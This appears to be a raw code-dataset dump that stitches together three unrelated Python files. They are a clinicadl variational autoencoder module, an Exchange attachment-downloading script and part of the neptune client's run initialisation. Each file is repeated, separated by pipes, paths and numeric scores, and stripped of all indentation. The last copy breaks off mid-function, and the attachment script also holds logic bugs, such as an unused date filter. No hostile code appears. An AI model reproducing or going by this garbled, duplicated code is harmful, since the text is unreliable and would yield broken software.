decoder = VAE_Decoder(
input_shape=input_size,
latent_size=latent_channels,
feature_size=feature_channels,
latent_dim=2,
n_conv=n_conv,
last_layer_channels=io_layer_channel,
padding=encoder.decoder_padding,
)
super(VanillaSpatialVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class Vanilla3DVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
n_conv = 4
first_layer_channels = 32
last_layer_channels = 32
feature_channels = 512
latent_channels = 1
decoder_output_padding = [
[1, 0, 0],
[0, 0, 0],
[0, 0, 1],
]
input_c = input_size[0]
# input_h = input_size[1]
# input_w = input_size[2]
# Encoder
encoder_layers = []
# Input Layer
encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
# Conv Layers
for i in range(n_conv - 1):
encoder_layers.append(
EncoderLayer3D(
first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
)
)
encoder_layers.append(
nn.Sequential(
nn.Conv3d(
first_layer_channels * 2 ** (n_conv - 1),
feature_channels,
4,
stride=2,
padding=1,
bias=False,
),
nn.ReLU(),
)
)
encoder = nn.Sequential(*encoder_layers)
# Latent space
mu_layer = nn.Conv3d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
var_layer = nn.Conv3d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
# Decoder
decoder_layers = []
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
latent_channels,
feature_channels,
3,
stride=1,
padding=1,
bias=False,
),
nn.ReLU(),
nn.ConvTranspose3d(
feature_channels,
last_layer_channels * 2 ** (n_conv - 1),
4,
stride=2,
padding=1,
output_padding=[0, 1, 1],
bias=False,
),
nn.ReLU(),
)
)
for i in range(n_conv - 1, 0, -1):
decoder_layers.append(
DecoderLayer3D(
last_layer_channels * 2 ** (i),
last_layer_channels * 2 ** (i - 1),
output_padding=decoder_output_padding[-i],
)
)
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
last_layer_channels,
input_c,
4,
stride=2,
padding=1,
output_padding=[1, 0, 1],
bias=False,
),
nn.Sigmoid(),
)
)
decoder = nn.Sequential(*decoder_layers)
super(Vanilla3DVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class Vanilla3DdenseVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size=256,
feature_size=1024,
n_conv=4,
io_layer_channels=8,
recons_weight=1,
KL_weight=1,
gpu=True,
):
first_layer_channels = io_layer_channels
last_layer_channels = io_layer_channels
# automatically compute padding
decoder_output_padding = [
# [1, 0, 0],
# [0, 0, 0],
# [0, 0, 1],
]
input_c = input_size[0]
input_d = input_size[1]
input_h = input_size[2]
input_w = input_size[3]
d, h, w = input_d, input_h, input_w
# ENCODER
encoder_layers = []
# Input Layer
encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
decoder_output_padding.append([d % 2, h % 2, w % 2])
d, h, w = d // 2, h // 2, w // 2
# Conv Layers
for i in range(n_conv - 1):
encoder_layers.append(
EncoderLayer3D(
first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
)
)
# Construct output paddings
decoder_output_padding.append([d % 2, h % 2, w % 2])
d, h, w = d // 2, h // 2, w // 2
n_pix = (
first_layer_channels
* 2 ** (n_conv - 1)
* (input_d // (2**n_conv))
* (input_h // (2**n_conv))
* (input_w // (2**n_conv))
)
# Flatten
encoder_layers.append(Flatten())
# Intermediate feature space
if feature_size == 0:
feature_space = n_pix
else:
feature_space = feature_size
encoder_layers.append(
nn.Sequential(nn.Linear(n_pix, feature_space), nn.ReLU())
)
encoder = nn.Sequential(*encoder_layers)
# LATENT SPACE
mu_layer = nn.Linear(feature_space, latent_space_size)
var_layer = nn.Linear(feature_space, latent_space_size)
# DECODER
decoder_layers = []
# Intermediate feature space
if feature_size == 0:
decoder_layers.append(
nn.Sequential(
nn.Linear(latent_space_size, n_pix),
nn.ReLU(),
)
)
else:
decoder_layers.append(
nn.Sequential(
nn.Linear(latent_space_size, feature_size),
nn.ReLU(),
nn.Linear(feature_size, n_pix),
nn.ReLU(),
)
)
# Unflatten
decoder_layers.append(
Unflatten3D(
last_layer_channels * 2 ** (n_conv - 1),
input_d // (2**n_conv),
input_h // (2**n_conv),
input_w // (2**n_conv),
)
)
# Decoder layers
for i in range(n_conv - 1, 0, -1):
decoder_layers.append(
DecoderLayer3D(
last_layer_channels * 2 ** (i),
last_layer_channels * 2 ** (i - 1),
output_padding=decoder_output_padding[i],
)
)
# Output layer
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
last_layer_channels,
input_c,
4,
stride=2,
padding=1,
output_padding=decoder_output_padding[0],
bias=False,
),
nn.Sigmoid(),
)
)
decoder = nn.Sequential(*decoder_layers)
super(Vanilla3DdenseVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
is_3D=False,
recons_weight=recons_weight,
KL_weight=KL_weight,
) | clinicadl/utils/network/vae/vanilla_vae.py | import torch
from torch import nn
from clinicadl.utils.network.vae.base_vae import BaseVAE
from clinicadl.utils.network.vae.vae_utils import (
DecoderLayer3D,
EncoderLayer3D,
Flatten,
Unflatten3D,
VAE_Decoder,
VAE_Encoder,
)
class VanillaDenseVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
n_conv = 4
io_layer_channel = 32
encoder = VAE_Encoder(
input_shape=input_size,
feature_size=feature_size,
latent_dim=1,
n_conv=n_conv,
first_layer_channels=io_layer_channel,
)
mu_layer = nn.Linear(feature_size, latent_space_size)
var_layer = nn.Linear(feature_size, latent_space_size)
decoder = VAE_Decoder(
input_shape=input_size,
latent_size=latent_space_size,
feature_size=feature_size,
latent_dim=1,
n_conv=n_conv,
last_layer_channels=io_layer_channel,
padding=encoder.decoder_padding,
)
super(VanillaDenseVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class VanillaSpatialVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
feature_channels = 64
latent_channels = 1
n_conv = 4
io_layer_channel = 32
encoder = VAE_Encoder(
input_shape=input_size,
feature_size=feature_channels,
latent_dim=2,
n_conv=n_conv,
first_layer_channels=io_layer_channel,
)
mu_layer = nn.Conv2d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
var_layer = nn.Conv2d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
decoder = VAE_Decoder(
input_shape=input_size,
latent_size=latent_channels,
feature_size=feature_channels,
latent_dim=2,
n_conv=n_conv,
last_layer_channels=io_layer_channel,
padding=encoder.decoder_padding,
)
super(VanillaSpatialVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class Vanilla3DVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size,
feature_size,
recons_weight,
KL_weight,
gpu=True,
):
n_conv = 4
first_layer_channels = 32
last_layer_channels = 32
feature_channels = 512
latent_channels = 1
decoder_output_padding = [
[1, 0, 0],
[0, 0, 0],
[0, 0, 1],
]
input_c = input_size[0]
# input_h = input_size[1]
# input_w = input_size[2]
# Encoder
encoder_layers = []
# Input Layer
encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
# Conv Layers
for i in range(n_conv - 1):
encoder_layers.append(
EncoderLayer3D(
first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
)
)
encoder_layers.append(
nn.Sequential(
nn.Conv3d(
first_layer_channels * 2 ** (n_conv - 1),
feature_channels,
4,
stride=2,
padding=1,
bias=False,
),
nn.ReLU(),
)
)
encoder = nn.Sequential(*encoder_layers)
# Latent space
mu_layer = nn.Conv3d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
var_layer = nn.Conv3d(
feature_channels, latent_channels, 3, stride=1, padding=1, bias=False
)
# Decoder
decoder_layers = []
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
latent_channels,
feature_channels,
3,
stride=1,
padding=1,
bias=False,
),
nn.ReLU(),
nn.ConvTranspose3d(
feature_channels,
last_layer_channels * 2 ** (n_conv - 1),
4,
stride=2,
padding=1,
output_padding=[0, 1, 1],
bias=False,
),
nn.ReLU(),
)
)
for i in range(n_conv - 1, 0, -1):
decoder_layers.append(
DecoderLayer3D(
last_layer_channels * 2 ** (i),
last_layer_channels * 2 ** (i - 1),
output_padding=decoder_output_padding[-i],
)
)
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
last_layer_channels,
input_c,
4,
stride=2,
padding=1,
output_padding=[1, 0, 1],
bias=False,
),
nn.Sigmoid(),
)
)
decoder = nn.Sequential(*decoder_layers)
super(Vanilla3DVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
recons_weight=recons_weight,
KL_weight=KL_weight,
is_3D=False,
)
class Vanilla3DdenseVAE(BaseVAE):
def __init__(
self,
input_size,
latent_space_size=256,
feature_size=1024,
n_conv=4,
io_layer_channels=8,
recons_weight=1,
KL_weight=1,
gpu=True,
):
first_layer_channels = io_layer_channels
last_layer_channels = io_layer_channels
# automatically compute padding
decoder_output_padding = [
# [1, 0, 0],
# [0, 0, 0],
# [0, 0, 1],
]
input_c = input_size[0]
input_d = input_size[1]
input_h = input_size[2]
input_w = input_size[3]
d, h, w = input_d, input_h, input_w
# ENCODER
encoder_layers = []
# Input Layer
encoder_layers.append(EncoderLayer3D(input_c, first_layer_channels))
decoder_output_padding.append([d % 2, h % 2, w % 2])
d, h, w = d // 2, h // 2, w // 2
# Conv Layers
for i in range(n_conv - 1):
encoder_layers.append(
EncoderLayer3D(
first_layer_channels * 2**i, first_layer_channels * 2 ** (i + 1)
)
)
# Construct output paddings
decoder_output_padding.append([d % 2, h % 2, w % 2])
d, h, w = d // 2, h // 2, w // 2
n_pix = (
first_layer_channels
* 2 ** (n_conv - 1)
* (input_d // (2**n_conv))
* (input_h // (2**n_conv))
* (input_w // (2**n_conv))
)
# Flatten
encoder_layers.append(Flatten())
# Intermediate feature space
if feature_size == 0:
feature_space = n_pix
else:
feature_space = feature_size
encoder_layers.append(
nn.Sequential(nn.Linear(n_pix, feature_space), nn.ReLU())
)
encoder = nn.Sequential(*encoder_layers)
# LATENT SPACE
mu_layer = nn.Linear(feature_space, latent_space_size)
var_layer = nn.Linear(feature_space, latent_space_size)
# DECODER
decoder_layers = []
# Intermediate feature space
if feature_size == 0:
decoder_layers.append(
nn.Sequential(
nn.Linear(latent_space_size, n_pix),
nn.ReLU(),
)
)
else:
decoder_layers.append(
nn.Sequential(
nn.Linear(latent_space_size, feature_size),
nn.ReLU(),
nn.Linear(feature_size, n_pix),
nn.ReLU(),
)
)
# Unflatten
decoder_layers.append(
Unflatten3D(
last_layer_channels * 2 ** (n_conv - 1),
input_d // (2**n_conv),
input_h // (2**n_conv),
input_w // (2**n_conv),
)
)
# Decoder layers
for i in range(n_conv - 1, 0, -1):
decoder_layers.append(
DecoderLayer3D(
last_layer_channels * 2 ** (i),
last_layer_channels * 2 ** (i - 1),
output_padding=decoder_output_padding[i],
)
)
# Output layer
decoder_layers.append(
nn.Sequential(
nn.ConvTranspose3d(
last_layer_channels,
input_c,
4,
stride=2,
padding=1,
output_padding=decoder_output_padding[0],
bias=False,
),
nn.Sigmoid(),
)
)
decoder = nn.Sequential(*decoder_layers)
super(Vanilla3DdenseVAE, self).__init__(
encoder,
decoder,
mu_layer,
var_layer,
latent_space_size,
gpu=gpu,
is_3D=False,
recons_weight=recons_weight,
KL_weight=KL_weight,
) | 0.8758 | 0.382141 |
import os
import errno
from datetime import datetime, timedelta
from getpass import getpass
import pytz
from exchangelib import (
DELEGATE, Account, Configuration, EWSDateTime, FileAttachment,
ItemAttachment, Message, ServiceAccount
)
from config import (
ALLOWED_EXTENSIONS, DOWNLOAD_ATTACHED_EMAILS,
DOWNLOAD_ROOT_PATH, OUTGOING_SERVER, RANGE_IN_SECONDS,
TIMEZONE
)
PARSED_EXTENSIONS = [ext for ext in (x.strip() for x in ALLOWED_EXTENSIONS.split(","))]
def get_user_login():
"""Get user login credentials"""
# User login
username, password = ("", "")
while username == "":
username = input("Enter username: ")
email = input("Enter email (optional if username is email): ")
while password == "":
password = getpass("Enter password: ")
return (username.strip(), email.strip(), password)
def login(username, email, password):
"""Login to MS Exchange account"""
print("Logging in...")
# Construct login credentials with fault tolerant ServiceAccount
credentials = ServiceAccount(username=username, password=password)
config = Configuration(server=OUTGOING_SERVER, credentials=credentials)
# Retrieve account
account = Account(
primary_smtp_address=email if bool(email) else username,
autodiscover=False,
config=config,
access_type=DELEGATE
)
print("Login successful.")
return account
def check_directories(path):
"""Checks if directories exist along path and create accordingly"""
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
def is_valid_extension(filename):
"""Checks if file is of correct extension"""
ext = filename.split(".")[-1]
return ext in PARSED_EXTENSIONS
def get_attachments(inbox):
"""Downloads all attachments to host machine"""
start_date = datetime.now() - timedelta(seconds=RANGE_IN_SECONDS)
year, month, date = (start_date.year, start_date.month, start_date.day)
ews_start_date = pytz.timezone(TIMEZONE).localize(EWSDateTime(year, month, date + 1))
print("Retrieving attachments from {0}...".format(ews_start_date))
qs = inbox.filter(datetime_received__gte=ews_start_date)
for item in inbox.all():
formatted_datetime = datetime.strftime(item.datetime_received, "%Y-%m-%d-%H-%M-%S")
for attachment in item.attachments:
if isinstance(attachment, FileAttachment) and is_valid_extension(attachment.name):
local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.name)
check_directories(local_path)
with open(local_path, 'wb') as f:
f.write(attachment.content)
print("Saved attachment to {0}".format(local_path))
elif isinstance(attachment, ItemAttachment) and DOWNLOAD_ATTACHED_EMAILS:
if isinstance(attachment.item, Message):
local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.item.subject)
check_directories(local_path)
with open(local_path, 'wb') as f:
f.write(attachment.item.body)
print("Saved email to {0}".format(local_path))
else:
print("Skipping..")
def run():
"""Executes script"""
username, email, password = get_user_login()
account = login(username, email, password)
inbox = account.inbox
get_attachments(inbox)
if __name__ == "__main__":
run() | crawler.py | import os
import errno
from datetime import datetime, timedelta
from getpass import getpass
import pytz
from exchangelib import (
DELEGATE, Account, Configuration, EWSDateTime, FileAttachment,
ItemAttachment, Message, ServiceAccount
)
from config import (
ALLOWED_EXTENSIONS, DOWNLOAD_ATTACHED_EMAILS,
DOWNLOAD_ROOT_PATH, OUTGOING_SERVER, RANGE_IN_SECONDS,
TIMEZONE
)
PARSED_EXTENSIONS = [ext for ext in (x.strip() for x in ALLOWED_EXTENSIONS.split(","))]
def get_user_login():
"""Get user login credentials"""
# User login
username, password = ("", "")
while username == "":
username = input("Enter username: ")
email = input("Enter email (optional if username is email): ")
while password == "":
password = getpass("Enter password: ")
return (username.strip(), email.strip(), password)
def login(username, email, password):
"""Login to MS Exchange account"""
print("Logging in...")
# Construct login credentials with fault tolerant ServiceAccount
credentials = ServiceAccount(username=username, password=password)
config = Configuration(server=OUTGOING_SERVER, credentials=credentials)
# Retrieve account
account = Account(
primary_smtp_address=email if bool(email) else username,
autodiscover=False,
config=config,
access_type=DELEGATE
)
print("Login successful.")
return account
def check_directories(path):
"""Checks if directories exist along path and create accordingly"""
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
def is_valid_extension(filename):
"""Checks if file is of correct extension"""
ext = filename.split(".")[-1]
return ext in PARSED_EXTENSIONS
def get_attachments(inbox):
"""Downloads all attachments to host machine"""
start_date = datetime.now() - timedelta(seconds=RANGE_IN_SECONDS)
year, month, date = (start_date.year, start_date.month, start_date.day)
ews_start_date = pytz.timezone(TIMEZONE).localize(EWSDateTime(year, month, date + 1))
print("Retrieving attachments from {0}...".format(ews_start_date))
qs = inbox.filter(datetime_received__gte=ews_start_date)
for item in inbox.all():
formatted_datetime = datetime.strftime(item.datetime_received, "%Y-%m-%d-%H-%M-%S")
for attachment in item.attachments:
if isinstance(attachment, FileAttachment) and is_valid_extension(attachment.name):
local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.name)
check_directories(local_path)
with open(local_path, 'wb') as f:
f.write(attachment.content)
print("Saved attachment to {0}".format(local_path))
elif isinstance(attachment, ItemAttachment) and DOWNLOAD_ATTACHED_EMAILS:
if isinstance(attachment.item, Message):
local_path = os.path.join(DOWNLOAD_ROOT_PATH, formatted_datetime, attachment.item.subject)
check_directories(local_path)
with open(local_path, 'wb') as f:
f.write(attachment.item.body)
print("Saved email to {0}".format(local_path))
else:
print("Skipping..")
def run():
"""Executes script"""
username, email, password = get_user_login()
account = login(username, email, password)
inbox = account.inbox
get_attachments(inbox)
if __name__ == "__main__":
run() | 0.319121 | 0.096578 |
import logging
import os
import re
import uuid
from datetime import datetime
from pathlib import Path
from platform import node as get_hostname
from typing import List, Optional, Union
import click
from neptune.new.attributes import constants as attr_consts
from neptune.new.constants import (
ASYNC_DIRECTORY,
NEPTUNE_RUNS_DIRECTORY,
OFFLINE_DIRECTORY,
)
from neptune.new.envs import CUSTOM_RUN_ID_ENV_NAME, NEPTUNE_NOTEBOOK_ID, NEPTUNE_NOTEBOOK_PATH, PROJECT_ENV_NAME
from neptune.new.exceptions import (NeptuneIncorrectProjectNameException, NeptuneMissingProjectNameException,
NeptuneRunResumeAndCustomIdCollision)
from neptune.new.internal.backends.hosted_neptune_backend import HostedNeptuneBackend
from neptune.new.internal.backends.neptune_backend import NeptuneBackend
from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock
from neptune.new.internal.backends.offline_neptune_backend import OfflineNeptuneBackend
from neptune.new.internal.backgroud_job_list import BackgroundJobList
from neptune.new.internal.containers.disk_queue import DiskQueue
from neptune.new.internal.credentials import Credentials
from neptune.new.internal.hardware.hardware_metric_reporting_job import HardwareMetricReportingJob
from neptune.new.internal.notebooks.notebooks import create_checkpoint
from neptune.new.internal.operation import Operation
from neptune.new.internal.operation_processors.async_operation_processor import AsyncOperationProcessor
from neptune.new.internal.operation_processors.offline_operation_processor import OfflineOperationProcessor
from neptune.new.internal.operation_processors.sync_operation_processor import SyncOperationProcessor
from neptune.new.internal.streams.std_capture_background_job import (
StderrCaptureBackgroundJob,
StdoutCaptureBackgroundJob,
)
from neptune.new.internal.utils import verify_collection_type, verify_type
from neptune.new.internal.utils.git import discover_git_repo_location, get_git_info
from neptune.new.internal.utils.ping_background_job import PingBackgroundJob
from neptune.new.internal.utils.source_code import upload_source_code
from neptune.new.run import Run
from neptune.new.types.series.string_series import StringSeries
from neptune.new.version import version as parsed_version
from neptune.patterns import PROJECT_QUALIFIED_NAME_PATTERN
__version__ = str(parsed_version)
_logger = logging.getLogger(__name__)
OFFLINE = "offline"
DEBUG = "debug"
ASYNC = "async"
SYNC = "sync"
def init(project: Optional[str] = None,
api_token: Optional[str] = None,
run: Optional[str] = None,
custom_run_id: Optional[str] = None,
mode: str = ASYNC,
name: Optional[str] = None,
description: Optional[str] = None,
tags: Optional[Union[List[str], str]] = None,
source_files: Optional[Union[List[str], str]] = None,
capture_stdout: bool = True,
capture_stderr: bool = True,
capture_hardware_metrics: bool = True,
monitoring_namespace: str = "monitoring",
flush_period: float = 5,
proxies: dict = None) -> Run:
verify_type("project", project, (str, type(None)))
verify_type("api_token", api_token, (str, type(None)))
verify_type("run", run, (str, type(None)))
verify_type("custom_run_id", custom_run_id, (str, type(None)))
verify_type("mode", mode, str)
verify_type("name", name, (str, type(None)))
verify_type("description", description, (str, type(None)))
verify_type("capture_stdout", capture_stdout, bool)
verify_type("capture_stderr", capture_stderr, bool)
verify_type("capture_hardware_metrics", capture_hardware_metrics, bool)
verify_type("monitoring_namespace", monitoring_namespace, str)
verify_type("flush_period", flush_period, (int, float))
verify_type("proxies", proxies, (dict, type(None)))
if tags is not None:
if isinstance(tags, str):
tags = [tags]
else:
verify_collection_type("tags", tags, str)
if source_files is not None:
if isinstance(source_files, str):
source_files = [source_files]
else:
verify_collection_type("source_files", source_files, str)
name = "Untitled" if run is None and name is None else name
description = "" if run is None and description is None else description
hostname = get_hostname() if run is None else None
custom_run_id = custom_run_id or os.getenv(CUSTOM_RUN_ID_ENV_NAME)
if run and custom_run_id:
raise NeptuneRunResumeAndCustomIdCollision()
if mode == ASYNC:
# TODO Initialize backend in async thread
backend = HostedNeptuneBackend(
credentials=Credentials(api_token=api_token),
proxies=proxies)
elif mode == SYNC:
backend = HostedNeptuneBackend(
credentials=Credentials(api_token=api_token),
proxies=proxies)
elif mode == DEBUG:
backend = NeptuneBackendMock()
elif mode == OFFLINE:
backend = OfflineNeptuneBackend()
else:
raise ValueError('mode should be one of ["async", "sync", "offline", "debug"]')
if mode == OFFLINE or mode == DEBUG:
project = 'offline/project-placeholder'
elif not project:
project = os.getenv(PROJECT_ENV_NAME)
if not project:
raise NeptuneMissingProjectNameException()
if not re.match(PROJECT_QUALIFIED_NAME_PATTERN, project):
raise NeptuneIncorrectProjectNameException(project)
project_obj = backend.get_project(project)
if run:
api_run = backend.get_run(project + '/' + run)
else:
git_ref = get_git_info(discover_git_repo_location())
if custom_run_id and len(custom_run_id) > 32:
_logger.warning('Given custom_run_id exceeds 32 characters and it will be ignored.')
custom_run_id = None
notebook_id, checkpoint_id = _create_notebook_checkpoint(backend)
api_run = backend.create_run(project_obj.uuid, git_ref, custom_run_id, notebook_id, checkpoint_id)
if mode == ASYNC:
run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, ASYNC_DIRECTORY, api_run.uuid)
try:
execution_id = len(os.listdir(run_path))
except FileNotFoundError:
execution_id = 0
execution_path = "{}/exec-{}-{}".format(run_path, execution_id, datetime.now())
execution_path = execution_path.replace(" ", "_").replace(":", ".")
operation_processor = AsyncOperationProcessor(
api_run.uuid,
DiskQueue(Path(execution_path), lambda x: x.to_dict(), Operation.from_dict),
backend,
sleep_time=flush_period)
elif mode == SYNC:
operation_processor = SyncOperationProcessor(api_run.uuid, backend)
elif mode == DEBUG:
operation_processor = SyncOperationProcessor(api_run.uuid, backend)
elif mode == OFFLINE:
# Run was returned by mocked backend and has some random UUID.
run_path = "{}/{}/{}".format(NEPTUNE_RUNS_DIRECTORY, OFFLINE_DIRECTORY, api_run.uuid)
storage_queue = DiskQueue(Path(run_path),
lambda x: x.to_dict(),
Operation.from_dict)
operation_processor = OfflineOperationProcessor(storage_queue)
else:
raise ValueError('mode should be on of ["async", "sync", "offline", "debug"]')
stdout_path = "{}/stdout".format(monitoring_namespace)
stderr_path = "{}/stderr".format(monitoring_namespace)
background_jobs = []
if capture_stdout:
background_jobs.append(StdoutCaptureBackgroundJob(attribute_name=stdout_path))
if capture_stderr:
background_jobs.append(StderrCaptureBackgroundJob(attribute_name=stderr_path))
if capture_hardware_metrics:
background_jobs.append(HardwareMetricReportingJob(attribute_namespace=monitoring_namespace))
background_jobs.append(PingBackgroundJob())
_run = Run(api_run.uuid, backend, operation_processor, BackgroundJobList(background_jobs))
if mode != OFFLINE:
_run.sync(wait=False)
if name is not None:
_run[attr_consts.SYSTEM_NAME_ATTRIBUTE_PATH] = name
if description is not None:
_run[attr_consts.SYSTEM_DESCRIPTION_ATTRIBUTE_PATH] = description
if hostname is not None:
_run[attr_consts.SYSTEM_HOSTNAME_ATTRIBUTE_PATH] = hostname
if tags is not None:
_run[attr_consts.SYSTEM_TAGS_ATTRIBUTE_PATH].add(tags)
if capture_stdout and not _run.exists(stdout_path):
_run.define(stdout_path, StringSeries([]))
if capture_stderr and not _run.exists(stderr_path):
_run.define(stderr_path, StringSeries([]))
upload_source_code(source_files=source_files, run=_run)
_run.start()
if mode == OFFLINE:
click.echo("offline/{}".format(api_run.uuid))
elif mode != DEBUG:
click.echo("{base_url}/{workspace}/{project}/e/{run_id}".format(
base_url=backend.get_display_address(),
workspace=api_run.workspace,
project=api_run.project_name,
run_id=api_run.short_id
))
return _run
def _create_notebook_checkpoint(backend: NeptuneBackend) -> (uuid.UUID, uuid.UUID):
notebook_id = None
if os.getenv(NEPTUNE_NOTEBOOK_ID, None) is not None:
try:
notebook_id = uuid.UUID(os.environ[NEPTUNE_NOTEBOOK_ID])
except ValueError:
_logger.warning("Invalid notebook ID, must be an UUID")
notebook_path = None
if os.getenv(NEPTUNE_NOTEBOOK_PATH, None) is not None:
notebook_path = os.environ[NEPTUNE_NOTEBOOK_PATH]
checkpoint_id = None
if notebook_id is not None and notebook_path is not None:
checkpoint_id = create_checkpoint(backend=backend,
notebook_id=notebook_id,
notebook_path=notebook_path)
return notebook_id, checkpoint_id | neptune/new/internal/init_impl.py | import logging
import os
import re
import uuid
from datetime import datetime
from pathlib import Path
from platform import node as get_hostname
from typing import List, Optional, Union
import click
from neptune.new.attributes import constants as attr_consts
from neptune.new.constants import (
ASYNC_DIRECTORY,
NEPTUNE_RUNS_DIRECTORY,
OFFLINE_DIRECTORY,
)
from neptune.new.envs import CUSTOM_RUN_ID_ENV_NAME, NEPTUNE_NOTEBOOK_ID, NEPTUNE_NOTEBOOK_PATH, PROJECT_ENV_NAME
from neptune.new.exceptions import (NeptuneIncorrectProjectNameException, NeptuneMissingProjectNameException,
NeptuneRunResumeAndCustomIdCollision)
from neptune.new.internal.backends.hosted_neptune_backend import HostedNeptuneBackend
from neptune.new.internal.backends.neptune_backend import NeptuneBackend
from neptune.new.internal.backends.neptune_backend_mock import NeptuneBackendMock
from neptune.new.internal.backends.offline_neptune_backend import OfflineNeptuneBackend
from neptune.new.internal.backgroud_job_list import BackgroundJobList
from neptune.new.internal.containers.disk_queue import DiskQueue
from neptune.new.internal.credentials import Credentials
from neptune.new.internal.hardware.hardware_metric_reporting_job import HardwareMetricReportingJob
from neptune.new.internal.notebooks.notebooks import create_checkpoint
from neptune.new.internal.operation import Operation
from neptune.new.internal.operation_processors.async_operation_processor import AsyncOperationProcessor
from neptune.new.internal.operation_processors.offline_operation_processor import OfflineOperationProcessor
from neptune.new.internal.operation_processors.sync_operation_processor import SyncOperationProcessor
from neptune.new.internal.streams.std_capture_background_job import (
StderrCaptureBackgroundJob,
StdoutCaptureBackgroundJob,
)
from neptune.new.internal.utils import verify_collection_type, verify_type
from neptune.new.internal.utils.git import discover_git_repo_location, get_git_info
from neptune.new.internal.utils.ping_background_job import PingBackgroundJob
from neptune.new.internal.utils.source_code import upload_source_code
from neptune.new.run import Run
from neptune.new.types.series.string_series import StringSeries
from neptune.new.version import version as parsed_version
from neptune.patterns import PROJECT_QUALIFIED_NAME_PATTERN
__version__ = str(parsed_version)
_logger = logging.getLogger(__name__)
OFFLINE = "offline"
DEBUG = "debug"
ASYNC = "async"
SYNC = "sync"
def init(project: Optional[str] = None,
api_token: Optional[str] = None,
run: Optional[str] = None,
custom_run_id: Optional[str] = None,
mode: str = ASYNC,
name: Optional[str] = None,
description: Optional[str] = None,
tags: Optional[Union[List[str], str]] = None,
source_files: Optional[Union[List[str], str]] = None,
capture_stdout: bool = True,
capture_stderr: bool = True,
capture_hardware_metrics: bool = True,
monitoring_namespace: str = "monitoring",
flush_period: float = 5,
proxies: dict = None) -> Run:
verify_type("project", project, (str, type(None)))
verify_type("api_token", api_token, (str, type(None)))
verify_type("run", run, (str, type(None)))
verify_type("custom_run_id", custom_run_id, (str, type(None)))
verify_type("mode", mode, str)
verify_type("name", name, (str, type(None)))
verify_type("description", description, (str, type(None)))
verify_type("capture_stdout", capture_stdout, bool)
verify_type("capture_stderr", capture_stderr, bool)
verify_type("capture_hardware_metrics", capture_hardware_metrics, bool)
verify_type("monitoring_namespace", monitoring_namespace, str)
verify_type("flush_period", flush_period, (int, float))
verify_type("proxies", proxies, (dict, type(None)))
if tags is not None:
if isinstance(tags, str):
tags = [tags]
else:
verify_collection_type("tags", tags, str)
if source_files is not None:
if isinstance(source_files, str):
source_files = [source_files]
else:
verify_collection_type("source_files", source_files, str)
name = "Untitled" if run is None and name is None else name
description = "" if run is None and description is None else description
hostname = get_hostname() if run is None else None
custom_run_id = custom_run_id or os.getenv(CUSTOM_RUN_ID_ENV_NAME)
if run and custom_run_id:
raise NeptuneRunResumeAndCustomIdCollision()
if mode == ASYNC:
# TODO Initialize backend in async thread
backend = HostedNeptuneBackend(
credentials=Credentials(api_token=api_token),
proxies=proxies)
elif mode == SYNC:
backend = HostedNeptuneBackend(
credentials=Credentials(api_token=api_token),
proxies=proxies)
elif mode == DEBUG:
backend = NeptuneBackendMock()
elif mode == OFFLINE:
backend = OfflineNeptuneBackend()
else:
raise ValueError('mode should be one of ["async", "sync", "offline", "debug"]')
if mode == OFFLINE or mode == DEBUG:
project = 'offline/project-placeholder'
elif not project:
project = os.getenv(PROJECT_ENV_NAME)
if not project:
raise NeptuneMissingProjectNameException()
if not re.match(PROJECT_QUALIFIED_NAME_PATTERN, project):
raise NeptuneIncorrectProjectNameException(project)
project_obj = backend.get_project(project)
if run:
api_run = backend.get_run(project + '/' + run)
else:
git_ref = get_git_info(discover_git_repo_location())
if custom_run_id and len(custom_run_id) > 32:
_logger.warning('Given custom_run_id exceeds 32 characters and it will be ignored.')
custom_run_id = None
